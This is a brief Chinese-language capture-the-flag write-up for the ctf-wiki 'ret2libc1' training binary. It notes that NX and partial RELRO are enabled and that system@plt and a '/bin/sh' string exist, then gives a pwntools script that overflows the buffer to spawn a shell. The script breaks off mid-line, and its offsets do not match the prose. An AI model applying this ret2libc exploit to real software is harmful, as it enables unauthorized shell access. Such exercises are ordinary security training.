题目链接 : https://github.com/ctf-wiki/ctf-challenges
ret2libc1
checksec一下只开了
NX
和 部分RELRO
main函数
secure函数
有溢出给了plt表里也有system函数的address 也有/bin/sh字符串,payload已经可以构造出来了
offset = 0x64
1 from pwn import *
2
3 io = process('./ret2libc1')
4
5 elf = ELF('./ret2libc1')
6
7 system_plt_addr = elf.plt['system']
8 binsh_addr = next(elf.search(b"/bin/sh"))
9 offset = 108
10
11 print('system_plt_addr:',system_plt_addr)
12 print('binsh_addr : ',binsh_addr)
13 #payload = flat([b'a'*(offset+4),system_plt_addr,p32(0),binsh_addr])
14 payload = b'a'*(offset+4